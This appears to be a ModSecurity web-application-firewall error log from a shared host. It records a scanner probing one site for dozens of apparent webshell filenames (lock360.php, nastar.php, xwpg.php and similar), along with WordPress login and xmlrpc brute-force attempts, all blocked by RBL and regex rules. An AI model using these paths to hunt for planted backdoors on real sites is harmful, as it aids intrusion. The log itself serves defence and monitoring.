[Tue May 26 14:14:29.845615 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:25431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/Crypto.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCnAAAAGA"]
[Tue May 26 14:14:29.845740 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:25431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/Crypto.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCnAAAAGA"]
[Tue May 26 14:14:30.029250 2026] [security2:error] [pid 598542:tid 598745] [client 20.151.112.53:43266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/firewall.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCngAAAEk"]
[Tue May 26 14:14:30.029419 2026] [security2:error] [pid 598542:tid 598745] [client 20.151.112.53:43266] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/firewall.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCngAAAEk"]
[Tue May 26 14:14:30.236859 2026] [security2:error] [pid 598542:tid 598787] [client 20.151.112.53:4544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pi.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCogAAAHM"]
[Tue May 26 14:14:30.236997 2026] [security2:error] [pid 598542:tid 598787] [client 20.151.112.53:4544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pi.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCogAAAHM"]
[Tue May 26 14:14:30.548331 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:52499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/testphp.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCrQAAACI"]
[Tue May 26 14:14:30.548468 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:52499] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/testphp.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCrQAAACI"]
[Tue May 26 14:14:30.698922 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:31225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/build.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCsQAAADI"]
[Tue May 26 14:14:30.699064 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:31225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/build.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCsQAAADI"]
[Tue May 26 14:14:30.841685 2026] [security2:error] [pid 598542:tid 598690] [client 20.151.112.53:4866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file6.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCugAAABI"]
[Tue May 26 14:14:30.841770 2026] [security2:error] [pid 598542:tid 598690] [client 20.151.112.53:4866] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file6.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCugAAABI"]
[Tue May 26 14:14:30.984907 2026] [security2:error] [pid 598542:tid 598798] [client 20.151.112.53:4874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cabs.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCvgAAAH4"]
[Tue May 26 14:14:30.985023 2026] [security2:error] [pid 598542:tid 598798] [client 20.151.112.53:4874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cabs.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCvgAAAH4"]
[Tue May 26 14:14:31.018561 2026] [security2:error] [pid 598542:tid 598758] [client 202.141.30.10:65418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdb_4iWyZxnXeAW3JCwgAAAFY"]
[Tue May 26 14:14:31.019187 2026] [security2:error] [pid 598542:tid 598758] [client 202.141.30.10:65418] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdb_4iWyZxnXeAW3JCwgAAAFY"]
[Tue May 26 14:14:31.158230 2026] [security2:error] [pid 598542:tid 598736] [client 20.151.112.53:4881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file15.php"] [unique_id "ahVdb_4iWyZxnXeAW3JCxwAAAEA"]
[Tue May 26 14:14:31.158330 2026] [security2:error] [pid 598542:tid 598736] [client 20.151.112.53:4881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file15.php"] [unique_id "ahVdb_4iWyZxnXeAW3JCxwAAAEA"]
[Tue May 26 14:14:31.254537 2026] [security2:error] [pid 598542:tid 598729] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdbv4iWyZxnXeAW3JCuAAAADk"]
[Tue May 26 14:14:31.463669 2026] [security2:error] [pid 598542:tid 598731] [client 20.151.112.53:42727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC0QAAADs"]
[Tue May 26 14:14:31.463805 2026] [security2:error] [pid 598542:tid 598731] [client 20.151.112.53:42727] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/lock360.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC0QAAADs"]
[Tue May 26 14:14:31.631522 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:4881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/security.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC1gAAAGA"]
[Tue May 26 14:14:31.631646 2026] [security2:error] [pid 598542:tid 598768] [client 20.151.112.53:4881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/security.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC1gAAAGA"]
[Tue May 26 14:14:31.856110 2026] [security2:error] [pid 598542:tid 598766] [client 20.151.112.53:52573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/title.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC4AAAAF4"]
[Tue May 26 14:14:31.856202 2026] [security2:error] [pid 598542:tid 598766] [client 20.151.112.53:52573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/title.php"] [unique_id "ahVdb_4iWyZxnXeAW3JC4AAAAF4"]
[Tue May 26 14:14:32.021402 2026] [security2:error] [pid 598542:tid 598745] [client 20.151.112.53:4800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/N1.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC4QAAAEk"]
[Tue May 26 14:14:32.021505 2026] [security2:error] [pid 598542:tid 598745] [client 20.151.112.53:4800] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/N1.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC4QAAAEk"]
[Tue May 26 14:14:32.233028 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:52517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.well-known/nastar.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC5QAAAFw"]
[Tue May 26 14:14:32.233117 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:52517] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.well-known/nastar.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC5QAAAFw"]
[Tue May 26 14:14:32.376780 2026] [security2:error] [pid 598542:tid 598684] [client 20.151.112.53:52486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/no1.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC6QAAAAw"]
[Tue May 26 14:14:32.376918 2026] [security2:error] [pid 598542:tid 598684] [client 20.151.112.53:52486] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/no1.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC6QAAAAw"]
[Tue May 26 14:14:32.544911 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:35438] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/\\\\.[a-z0-9]{4}\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "784"] [id "900080"] [msg "PHP Mailer Access Attempt"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.sghb.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC7QAAADw"]
[Tue May 26 14:14:32.545043 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:35438] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.sghb.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC7QAAADw"]
[Tue May 26 14:14:32.717077 2026] [security2:error] [pid 598542:tid 598789] [client 20.151.112.53:39530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/jp.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC8gAAAHU"]
[Tue May 26 14:14:32.717196 2026] [security2:error] [pid 598542:tid 598789] [client 20.151.112.53:39530] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/jp.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC8gAAAHU"]
[Tue May 26 14:14:32.871237 2026] [security2:error] [pid 598542:tid 598794] [client 20.151.112.53:25447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC8wAAAHo"]
[Tue May 26 14:14:32.871391 2026] [security2:error] [pid 598542:tid 598794] [client 20.151.112.53:25447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahVdcP4iWyZxnXeAW3JC8wAAAHo"]
[Tue May 26 14:14:33.085307 2026] [security2:error] [pid 598542:tid 598758] [client 20.151.112.53:43291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xa.php"] [unique_id "ahVdcf4iWyZxnXeAW3JC-wAAAFY"]
[Tue May 26 14:14:33.085414 2026] [security2:error] [pid 598542:tid 598758] [client 20.151.112.53:43291] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xa.php"] [unique_id "ahVdcf4iWyZxnXeAW3JC-wAAAFY"]
[Tue May 26 14:14:33.231709 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:43285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahVdcf4iWyZxnXeAW3JC_gAAACk"]
[Tue May 26 14:14:33.231827 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:43285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahVdcf4iWyZxnXeAW3JC_gAAACk"]
[Tue May 26 14:14:33.419569 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:4587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xwpg.php"] [unique_id "ahVdcf4iWyZxnXeAW3JDAgAAAAE"]
[Tue May 26 14:14:33.419690 2026] [security2:error] [pid 598542:tid 598673] [client 20.151.112.53:4587] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xwpg.php"] [unique_id "ahVdcf4iWyZxnXeAW3JDAgAAAAE"]
[Tue May 26 14:14:33.505444 2026] [security2:error] [pid 598542:tid 598705] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdcf4iWyZxnXeAW3JC_QAAACE"]
[Tue May 26 14:14:33.608406 2026] [security2:error] [pid 598542:tid 598781] [client 20.151.112.53:39534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahVdcf4iWyZxnXeAW3JDDAAAAG0"]
[Tue May 26 14:14:33.608533 2026] [security2:error] [pid 598542:tid 598781] [client 20.151.112.53:39534] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahVdcf4iWyZxnXeAW3JDDAAAAG0"]
[Tue May 26 14:14:33.892831 2026] [security2:error] [pid 598542:tid 598686] [client 20.151.112.53:43304] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/assets/"] [unique_id "ahVdcf4iWyZxnXeAW3JDEgAAAA4"]
[Tue May 26 14:14:34.199409 2026] [security2:error] [pid 598542:tid 598709] [client 20.151.112.53:52578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdcv4iWyZxnXeAW3JDFgAAACU"]
[Tue May 26 14:14:34.291766 2026] [security2:error] [pid 598542:tid 598778] [client 20.151.112.53:43304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDGgAAAGo"]
[Tue May 26 14:14:34.291884 2026] [security2:error] [pid 598542:tid 598778] [client 20.151.112.53:43304] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDGgAAAGo"]
[Tue May 26 14:14:34.458256 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:40764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ddd.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDIwAAAFw"]
[Tue May 26 14:14:34.458359 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:40764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ddd.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDIwAAAFw"]
[Tue May 26 14:14:34.545820 2026] [security2:error] [pid 598542:tid 598609] [remote 37.187.156.42:58732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDGwAAUEI"]
[Tue May 26 14:14:34.605326 2026] [security2:error] [pid 598542:tid 598757] [client 20.151.112.53:4924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/sunrise/"] [unique_id "ahVdcv4iWyZxnXeAW3JDMAAAAFU"]
[Tue May 26 14:14:34.682671 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.112.53:52578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdcv4iWyZxnXeAW3JDNAAAAGg"]
[Tue May 26 14:14:34.755458 2026] [security2:error] [pid 598542:tid 598790] [client 20.151.112.53:4924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/jj.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDNQAAAHY"]
[Tue May 26 14:14:34.755569 2026] [security2:error] [pid 598542:tid 598790] [client 20.151.112.53:4924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/jj.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDNQAAAHY"]
[Tue May 26 14:14:34.898299 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:31228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ccc.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDNwAAACk"]
[Tue May 26 14:14:34.898412 2026] [security2:error] [pid 598542:tid 598713] [client 20.151.112.53:31228] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ccc.php"] [unique_id "ahVdcv4iWyZxnXeAW3JDNwAAACk"]
[Tue May 26 14:14:35.060162 2026] [security2:error] [pid 598542:tid 598756] [client 20.151.112.53:52501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDOwAAAFQ"]
[Tue May 26 14:14:35.060314 2026] [security2:error] [pid 598542:tid 598756] [client 20.151.112.53:52501] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDOwAAAFQ"]
